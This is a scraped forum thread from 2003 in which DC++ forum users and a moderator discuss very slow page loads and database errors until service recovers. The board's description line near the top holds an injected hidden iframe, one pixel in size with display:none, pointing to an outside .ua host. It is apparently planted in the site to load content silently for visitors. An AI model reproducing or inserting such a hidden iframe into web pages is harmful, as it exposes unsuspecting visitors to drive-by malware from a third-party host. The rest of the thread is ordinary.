Slow forum (2 minutes to load new pages)

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

Locked
joakim_tosteberg
Forum Moderator
Posts: 587
Joined: 2003-05-07 02:38
Location: Sweden, Linkoping

Slow forum (2 minutes to load new pages)

Post by joakim_tosteberg » 2003-12-01 11:43

Is it only me who are having this problem right now?
Takes me about two minutes to load a page here now, all other sites works fine including http://dcplusplus.sf.net.
Any idea why?

TheNOP
Posts: 275
Joined: 2003-07-07 21:41
Location: Quebec

Post by TheNOP » 2003-12-01 12:19

same here...
all SF forum are slow.
web server and forum server are not on same puters clusters.
TheNOP

Have you read the FAQ?
Or the sticky ? It might give you idea.

gemmell1
Posts: 26
Joined: 2003-11-24 09:52

Post by gemmell1 » 2003-12-01 12:28

same here, very slow loading, or a page saying, "phpbb error: cannot connect to database"

joakim_tosteberg
Forum Moderator
Posts: 587
Joined: 2003-05-07 02:38
Location: Sweden, Linkoping

Post by joakim_tosteberg » 2003-12-01 14:15

Looks loke you accidently trippel posted theNope, so I deleted all but one of your posts :wink: .
Let's hope that they will regain normal speed before I get to frustrated on this slowness...

joakim_tosteberg
Forum Moderator
Posts: 587
Joined: 2003-05-07 02:38
Location: Sweden, Linkoping

Post by joakim_tosteberg » 2003-12-02 07:43

Back to normal again :D :D :D

TheNOP
Posts: 275
Joined: 2003-07-07 21:41
Location: Quebec

Post by TheNOP » 2003-12-02 12:01

joakim_tosteberg wrote:Looks loke you accidently trippel posted theNope, so I deleted all but one of your posts :wink: .
Let's hope that they will regain normal speed before I get to frustrated on this slowness...

no problems joakim_tosteberg. :)
TheNOP

Have you read the FAQ?
Or the sticky ? It might give you idea.

Locked